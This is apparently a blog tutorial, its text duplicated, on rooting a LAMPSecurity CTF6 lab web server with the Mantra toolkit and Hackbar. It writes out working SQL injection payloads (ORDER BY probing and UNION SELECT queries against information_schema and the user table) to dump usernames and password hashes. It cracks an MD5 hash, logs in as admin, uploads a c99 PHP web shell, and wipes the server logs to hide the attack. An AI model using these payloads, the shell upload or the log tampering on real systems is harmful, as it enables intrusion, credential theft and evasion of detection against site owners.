Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: mantrahackbar1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHMBQd3ow59NzFDqldSt-VPCz8V3UeSB3itNENHWmNkojedhFXFiWXeZR4TDYBAH6xhhTkEB7m5aJJPNkY6nZBT-IoKhKfuTs4F7LanYLBvwwY2D8wQOs0hwwWWaJNHBxnFr52fXLVJhCAJNpZPq2drl4yPG_ahdvnLZ3bOqDvW55M=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: mantrahackbar2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uEgLSAxzVx8SN7POkGk2u4A9y55I-UNt3zZhWLxPIUwN1yzjQmUgwnc8EYGXu_4ewv5x87skNoW4IVRj4XyhnBnZx2QTCw9bPo_IX-2o8WPRWVcGwyYwKYOkM510TLdQ17PRbCvq94HpaAFHVdPQxMvJMzaOT1Gpxz6BqPA3cIVNU5hA=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: mantrahackbar3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uDWtI5tpWG7JvU5uEYmParGuMj8bT5aUDYBY7ESCRFXMnzzxFFO_F3OCTubQvcvXIFH_ApypIIrHGxd0D5WyL0TpHlK9Wj0FkHFbgPfSs9zs_Q4u3pIaTIU5qN3r-6ck4v8F_g9j5PFhYHXSEbzvMHAl_IDShQpokVfoDyn8aSeVaVHQ=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: mantrahackbar4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uWyfiDKhxYC-4wyFuMun9FOblXfT7LCqQUBOcjiKAvyrWQ_tRvxPE2uhWn3TqKLr2lNoch3CdBFDwGqbQRX2SMtHiVBRVNn3NEfbpitki7aCTSjm5fITuT1AvKdg7WwWg97ZMDvY6IVRxOr9KhOvHwawYwgCyCHHObi1ZXLM1K7ZzIzw=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: mantrahackbar6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sBrTxkTPHYF7YAftiqXjsG5PbqdWtZLynpnSGD9DkO_NtMy5EMvIbZYM5u54LruMsWrIoeMi2mskC2EMGA7zByVynmVu5NjwSpsMsbF60YbpkhnK6LN-2uHn4FnOVXOqVn_sZcJu97dluX_SaMn7uPDjTlImjMi2lua09XTyOJ3D12hw=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: mantrahackbar7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tFPxH0MEU6s99-utJSh5zWa7tm0semTvsIOfUNca5Bz0FkFqICIRwM-p8cd2H2L3Ytdl8WBRt9BsGnE8nu3nv9reQVQTKQJqTfJz_C9-XTz5dU0gTSYVOnangDKTq0pIuipRa4PfSMdz2FKS89cuM6KV-CjbPakdTFirJDU5xL5kwV=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: mantrahackbar12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uwanVYBMdV27dR0XXJdGXdyGUEn2QOCb58w689MggJnUzrVymZKxD-0XsnCHhnf13LHVGZweJ3XpCdCfSy01Bd0jkOoidtkNc5DYLx7YbeFpeRJaXPef0vuqH2OXdQnTZ0sObPdWMBusPG7sVmshGstAsL6v4-4I7W4nBCLCozTVmLImA=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: mantrahackbar13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_svhE57eZR4pMke73uP3UCE1kUfQgBxZHC-mC75nHuO1uv6gjG_n_MSKwBB6KrDl_OqF0SHKSduwzGuaItXnp6oA6TZ0D7PmFoxPDpEcUGSUc8w67UbXwBD68Ct2IpsqIjqsfrB6k1hRMbSksIbh854bVKjjcA5GVnvHNZdIsjRhwgpKWc=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: mantrahackbar14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_udwXE_lfvC4aplCMNPBxEfRYfb1F_uhTyQJeGZVzLi4qXQk6LMEJOujzYKhV9wW32vap0_R24GsqYrWI8M5-mz0cSE29CJ0-SWD_E_BhLRuN62MZSIswkBNYlVsXMKbb47I_KR8LTzqcX-96ZIMhu2YVFMkZcZd7AIz4m8BPUldz52mTg=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: mantrahackbar16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXaXHE4fDn-98MV16T6ZRoa4cWt5R19UMHZCeBbuX05rLVLPvfVVGfkpaCYMPyAQGAJGSd_WY8V_Jxzg0mzOpxz0WDUdz9_Z0QvikWI2lro88nwWJvj_QWWGFkGU2oee5XWq55tJOjP3VowdQHutn3xmqV6RFvcWGe3z1P-NQL4nZIhRw=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: mantrahackbar19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s27249v-5Jh7gxVIk2YCkMqpaiRJ3GEiGewOzV7H34Akhhq2QmGRP0V2AHwFu5TDFi56oCYYPkNp1hUf3RiVUq9nJI68LkvH4mPhiYKLcjjzDP4mSBkJHA48cMihb_lHActGmK6h7fW_xCRMpmV0k_Psgub7jLsfWsx0nU_J9KuJCsRQ=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: mantrahackbar21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_snwNmBqhe2r77DRk4OZ8karfBpkjeqcsD6a2oMcYTVsU7fPv16TQ-uCm2epBD4ovj0zRFXScOM-PBcJ64ayHU7id9vyANN4YZ49K6ns94USReZ2VuwhK4e7QMdvWfMTVXFKJNpLwbCq-JhPGX3W4zfJfnpH4Q-jaRRpBvX0-_mHQ7nkkg=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: mantrahackbar22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZAUnFq6U1pimIRrX4POO_K97qOVwx-fPgQpbi5OGsWg7vGtCpK629D2IdX5ZQAumRtcAfhQljqwOYVScS9ErEG9jumuWx7RUAoQbc-v2tOvXA43yfR0GdtX566Ps6xurTluezy04_XbjLxRtnagaELL4qDuDCURQOZxqMCD4kOwQbGyI=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: mantrahackbar23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vcP0xhmzDUPQ8dDoKz05SJoSrdB_d0JSpZhCvxCAfbF0Kc3S1g4A2p6s2uesvCnFcrMmG0yFeXAm_G6yHoL_mjUXu7gQwfCC7Gw4tSmnQxKYFGh48_idBkzZNXUEBp05hH6KC3ej4svg7KwgufjQewkDvkHWVqCSVGbg-r-KVk7dgs4Q=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: mantrahackbar24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s3Xr212ZwZ8zABZloJZXQJqWVpFR0IpPqn0ajaxyF-Bx_kZMaZaKSRAVQwpf5r3Nzz8d0fW8Z9Se08qts8cHgQKnUSKO0H9tpUiWm7TtZo4YYlqfbqM6QJm2kbz4CS7kjQ6zTCa098TXF-m4B3E71uRt8o3kIkJpbTNh9gNfAwGmaQcg=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: mantrahackbar25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sg3zPn7ohaR6OSeZrQtjSEddmzSpw98IQXwxhQp7kZjPhN5KoT5lGWTCLBku-XK-mJxpOgjymiqpmJXjTqsuZRyg_x8pW6DujPsCaSfDZiREV7s2qZEKm2Eu5Vz-1nENG5074ZCd-C2lpuMmcf1YaG5Olw6-AI8gY7g_-nJkeBc6Smcew=s0-d)
Step 17:
Lets find the user name
![[Image: mantrahackbar27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tW7vrUj7dT7vqQ3F0cs3lyh0vdSo089X-MMufQvH4WHwqXuGr08FZQLZzxww_UmJ7EcY7A3IfpZlBdg4Ih3__8Jcdsxz0kauM38OXCv-cjybOksNxoS0lp3dzomI1TifTQ9QtktY1bsTqWEJEwSoHZu33QdQ-lnXBOpBWxSjmxAXmguEg=s0-d)
Step 18:
Now, what about password
![[Image: mantrahackbar26.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vhEAv_wuRg2mjUvns_Fftks82pztK_lFi-j5hIkMgv5kEjpXyWyFzR7d-GEUo0hqbxKDsa7DAcmbZPSzD2T7tmdseN8m37uhfn0l4y4DMRsZe_fpH9KW0W4pKvMFsLZfxRrCqTF1DDKJMFKUXr2i-9KwFpKgWU4_bIHfSnVs-7dD88ScI=s0-d)
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
![[Image: mantrahackbar30.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s_9j2yutKsY27pZlCFpJJcwZOUfSKqNTl7JPBWdocfj5aQcqXimDx9zx0EdqWY-Wm4cKIsdKzrGLIMeF4o8fysYG24lNjpGsgaBOrI5XM_cgUvMYm8b-THNjhN_Q7DIyzMWZZ732F2wo_sDy7CYiy55oEa6hayC0XdlIJAg5XOuogw6_A=s0-d)
Step 20:
Voila.!!! I got the password
![[Image: mantrahackbar31.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sMQT8s5XF3D_ZM04d-bdCHOnh04J-yTClOyc8rY9loOWN179uncDFwRVNaLoEZgsJ6LirFcIKtxic26i38z1kTS5rhtNXaQ-c6MtwOwmUe6z5zudrz5VKWthMBByr8hga-TNzdbQ7EcSzrcySWOKZMuBjqaXb9x6Y3c3iBVvmbCcKmoW4=s0-d)
Step 21:
Finding the log in page. Its was right in front of me
![[Image: mantrahackbar32.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZkAWzzgdtmnWw9awVpL9csVeI0BaE7j3XJBYvzB5ZJ656oTaH0hPW8GEJIu53Fn5cBWYRuLeYW1MVdaIJjLyJVzhF771_fRrSIQVY6KViM6-6xNanqZts62tCAO0NYK6FuEIozzhw4COfy2aF6c4ZsWVS49C9obnPm9CUQGU-mM1WqOo=s0-d)
Step 22:
Logging in with the credentials I have
![[Image: mantrahackbar33.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vS_-pLI3JF-0AP_29rBnJkdPeRkLqj9g4s6aLedZ8_Uo0s3Jv_U5dNOL4CRU-sFAORHbb4uvSSjMYt1MQBjBC_hwRrZMXQ2r88deEIeBJJmSH_8h6QJOr8P91rO2fNeVgLD38EEnusWGM71M74GoGH4LVhqfj-B3SrNtDPGuR_dVxGGlc=s0-d)
Step 23:
Greetings.!!!
![[Image: mantrahackbar35.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ugWG1qwF0dJ_EFm1fbczaayBPlaLxcpxr_x9Dbta2A129ubDO9gAnC8-Mf-uUUrvyxF9dIZ1lWfBt-Nw92iu74WMuMjWxt3B5yjzZUzEn0Xpjrec8GhpGuz3rTWXcbx_i2g2Ono8RyigU16fmZkZPcP36bYVph0Z8BAuiDzwlg757wS_c=s0-d)
Step 24:
I'm an admin now. Look at my powers.
![[Image: mantrahackbar36.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sdHOvCwI1ZGq6gZHyxU4c_5xdnGh1_Q4BfLo8mPfjyNQFptPpBbJ5ao1jVeZ2N43w8k_c5vXtdMTRH3aqW0xktReEpgxgmfMFVUdVpPDTqpd8X57IgjYvEj0w2bh84TEe_K-LCQuvga7YO-o7kBOzvDm6Kh8SI9U1_gGDlatDPeURcvEU=s0-d)
Step 25:
Let me add an event
![[Image: mantrahackbar37.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sy1Aw9eXgHdKkP5Pet64GDSu9kvSDxsdpm6Ys-ld_3Q-5DJJsWgVKzV4hJV43MNydQtHEgkf16c-VW1w13hhRxzmjsUG-7FqnQOCri1XpGZnRiWoB3h-6eaxGpRtLuC86qc26JfLYgp0oCRx-EHc65nv-Vxqm4gf6FtUQs3DrIU61OjA=s0-d)
Step 26:
and of course I want to upload a picture
![[Image: mantrahackbar38.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tcMAdQ6P4rBxe9BZ7YsuX6koo0ogOsXPj8EX9h8qP-5cA115SfcmLhGGC0l8FWHLW3Zlq-01rcBng9eTwaFCucomw9SmBVrI525En6MMv3BXBUTVGXLHWex8JwajDndmMovKIRbYsqX9tuPCyBgERYMUZagvxfZE0Vwpw2TQMbEH9Sog=s0-d)
Step 27:
Lets see it allows me to upload the shell or not
![[Image: mantrahackbar39.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tRJv5D3AfQ3I1xQ0N89Jlc0ojUVNXMMNisBLarrtIT2fd7Mi7U_lDmpE_sy3EhSg4QvO1hSFb-G8rc_TWLaiOtvniuZJ9nbIq-3-hVr1M-sSBDwGwaVBIHIwOktEBExAuHwglzTENq_iLNO316g2C1tgzE9asp4xrTkKpe24IlYftuSBY=s0-d)
Step 28:
Now I'm pressing on "Add Event" button
![[Image: mantrahackbar40.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sry-Uonx9wE8ckTiepERNckpf6DRGiiPl4NUPPcRTPoX2Kjhi3Hz7Pn3fyo-ol1kJlAIoKtbhEKZTBXQkgqmlbBfFOCgceHCSUcufHqrihUAj38LCoEEymCE6rleS_9pGnBlr1gll7D736B8-7xmhSflr614RG_bzDr2wqnGVGk1AFF8o=s0-d)
Step 29:
Nice. Looks like it's got uploaded
![[Image: mantrahackbar41.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s3byTQAn0BZ-5w-scHeQv2rGqbBsz2vQ8lkMCNC5E2XZZspVHGm5P5RAS5lOftc8FBzGGHAyBIO7DzJgVYl-KpIMPZaGt3F334-AQKR7Vm9qBGon2Mh7OPEL7XD29PuVUOKGVji0BeFei_p2fiB2XUxMb3HKd2pNS3KDT4H0MqahiovQ=s0-d)
Step 30:
Let's see where the shell got uploaded to
![[Image: mantrahackbar42.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ue5osGkdUtsEmVmZ4AuldD_bAlKmQLVLbOaDXrE3fYPptrqG98scA1oQz3c-F1UTnjOIoYxjaihhO5auVAZSyNpyD5gZ0oKzvskND9P0VPRVSo7dxvT1QPBsYjsItdJwcwCuNQaRHfgLfU4TxCEmtoCAyEH3qtos5_2amNxxgWlxehtKw=s0-d)
Step 31:
I'm trying to get the default upload location
![[Image: mantrahackbar43.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tfvFlh61PK8ZrMIEC7ry-Qnp3-H1HAViEvDQMoZ45J0DlHC02uHfyC5ILVewtcjUs4x6JuAA_Kzrl5m5IyoXaK8ekWtKi7S2mmAtN_wJfmr7ESB8C13BMsm5XUnVkWV54p0SNf2L8uzIFueuipe3Qbz3B6DQhOm-dUIxxnzhbbpc7Oqr4=s0-d)
![[Image: mantrahackbar44.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tLqTW571Q1bec55AzfrTkKaipNTPrkKR__lGNVr3QA7S_2dKPqzKjkqu1V5MBgNe-rFBHTOks9SFXPX_FXzriJYfGpx5ODiw2ZWfblnZonFluJlovj2I5ORAPcO0epOs3Ecetl3zDe6WJf0lpqP-Xgw-nbf18FUenKfX5zZD1nvye-Ync=s0-d)
Step 32:
Looks like I got it
![[Image: mantrahackbar45.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sl_b8ZQIRxcB4PPeYxCOmnPz0fc5ijdzJwHcP8XyyKEU63q0ytUPn2Ylx3yZ6kdj1-AHeiQYt32-48T-A3P2zkNBRFvz6A_k2QTbp5zAZ78Z3rERiYu1fh-4Rw3SwF1pVgOeSpxOYL3FE-Si2o-xnFy0rZPRUNPMLmjkel6Vt64URURGI=s0-d)
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
![[Image: mantrahackbar46.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sbMABy7eX-zVEKVaTHyhce4UOvXuhTZcuEitK12OOZvCeRwul4xOsQyASzQLaNoNwnYfd9wGuQaz9nz7ixmD0-Y2iFfc9SVGwY3xvXAP4o8nQBku1wuA7BXl2aYoaBui3fV1zY1l4vb7FDSVK7mFwtzSAGgQFx2s9QiutGkrqkEQ8KyYM=s0-d)
Step 34:
I simply clicked on the up button to get the root folder
![[Image: mantrahackbar48.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tWC_vnDHT65LJM3zHaQKBfP_XFDhXesvlfBWaIteVlGSNtt8w0672N7PmaI5oe8AoetLbekkUNwlomhrbiZwr4_L57vgalkllvJGfdxJ65xtAonyzJb0JBoHbshUm8Eg7kocXKxBrgrMo66CHlyJjt52bpc8tmt6V7mb2amw3ZEWIQsI8=s0-d)
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
![[Image: mantrahackbar49.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v-AvHj1HTXoye8lkiAxUTRBCnvRGHJIA4AzIw2d5JTjzmN_AdE-9XtsEQez_oO6WTLv2MuLACD6Jih3rMYxuYhPn0_256kE6tUMiiaLMR4-iYcka7ieQ9GbrPwcpcQxboGn7E2Vbx7ayfC3CVk_09AgH0To8VTyfJbdmdHmW3am33Jiuo=s0-d)
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
![[Image: mantrahackbar51.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQgn5wEVstfQoHBWPS9kPtd-LAx68i30T_vEq1v9Kd24uLvHXw_g1VgbJfHsImrggS7q6kdnUXayTzxkYsG1jiUqX0K86Ik921KxYQ3mGCBnRlSPfLOxGAHgxdx7sFyM2aX7Epkb0PJlyeY3Ea84DlqWGpsei3ZwqapN5ejbRPzhHmDA=s0-d)
Step 37:
Let me go back and edit the log file
![[Image: mantrahackbar52.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u4hrlWFSje4bMkZBJGPFnS9LoXUmvYUqDwzwupRusqmGCDYTNYeGrOiiMPmTGAc0XuG_GVHtc8rF978KFV8nkO-vHjMw8ltuECagSLsWYO8ktczs_zHoSpilGcvcNhklI7yuyi2lil_khvgKePLYFxMr6gPSUZt_fBcwSBCDyAxlgfcwg=s0-d)
![[Image: mantrahackbar53.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vIqkwjsNCw1WtMgJD7VatHGt3_tA2ptUgaLgVyCuA6LsAX8BMKodDqEHTqSWLg86xqZ0N_aLZSAYTZFslON6R2zspj-Cou_s3-fAAUk3JJBDBrXL0pDYWAZiP2Cl1j29GaUVd-A5FoHiC62ORkHV-4qSnxNx2BICt-nQ3t1wqPXpo-vw=s0-d)
Step 38:
I deleted complete log entries. Now saving it.
![[Image: mantrahackbar54.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_su8RbQLc_lyOFfZ20Ig4WNTY5pmr9_iNQLcY-AvO8SC3C34pyA_FZdxoSGG2ozsFIFtQAljNpqGPeKzkZ2a4RfexuKzhdltmH880EgkUxdP3Haw4wBrKNhR_H5yg7kuDcjNIoATIPL050WDMxF2Z94b_TQj0k8V2nw2iYcep80U-jjEgo=s0-d)
Step 39:
Nice. Log file is empty now
![[Image: mantrahackbar56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uElEaoPbS699PCnAOp7l9Tp9CAmp0s6idJESGmGWWz3s4bAJflo0a34s50qfJqVNRwVA8NRwgrQ3SjXBEOwC9QAoPpdz41XRuHuU4V_xK7uYJDh5ke-gthhFxGjs1iC9ixDcV77A8UbMWoMBWVJ0wo_rCYhIByMMIVPx5kZZIRtRPKmoE=s0-d)
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
![[Image: mantrahackbar57.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_OslsAO-L8z1T4nLGe9Zk5ljN_r_qpwnlpJbsn7MY4n-zst3qG2sA1jxNVS-ufeHO-TVe7r25MMa1vvSWasurj_Ch520rpvdL7-0rcVkavCecG_iO4mf13gqfrpaXZbchjb1aAqmXGf1h99Qi0TADKqkn7hi0Hf1Tkc7kl2SXb1ky664=s0-d)
Step 41:
Confirmed.!!!
![[Image: mantrahackbar58.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_trzfSetp0KzhOvkrt5qHdg6DKoXuFLAUzQ4por4m8r_i7BWf3Srmkzn-D7g-3xYrl3ivt9BRLUW3wmUSZD4DIvHb9Fxp9qdI_nCivKv2ZClQZ8Ta-n0itmuJ4yN9V6qwiBMZ66M1wnGnrlCvTH9jzipXgdZkPTV0LMrj0LZrFLZj6kke0=s0-d)
Step 42:
OK. Good Bye C99
![[Image: mantrahackbar59.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tB1udu6KDHR1ylWCbFz9Ab5_2klvBTCYL1UPNv5fsojron5tZMAo56bVBna1vjCq1uBZyRb1LMRBRewg0MHR7V1peGXV86avxNKrcL20120i_Wuw2KKrOnYtmsGDqSXCeUTby-fVa26W-V-joii2K50nhQnZq_ok9now4h2qcRyoO1ZA=s0-d)
Step 43:
Well. It got deleted itself
![[Image: mantrahackbar60.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tydj0uUUKKp2fiO4qBhvQ3Gfl0t83drxiw_imYxH99pdyuzjIdzrzoixAnJtI_QUhadE0fvXo9SHwtRtXYDHWq2isn-eMty8EXXG0tWQaF4VKMBZHGqagEsd3JmqrRmWwPlEfQmZ3NJJ9afhKhbm0uR5EGLFzC80sS_PqomM-KcS4DTos=s0-d)
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
H4qqy H4ck!ng
This comment has been removed by a blog administrator.
ReplyDeleteHmmmok Nice share
ReplyDelete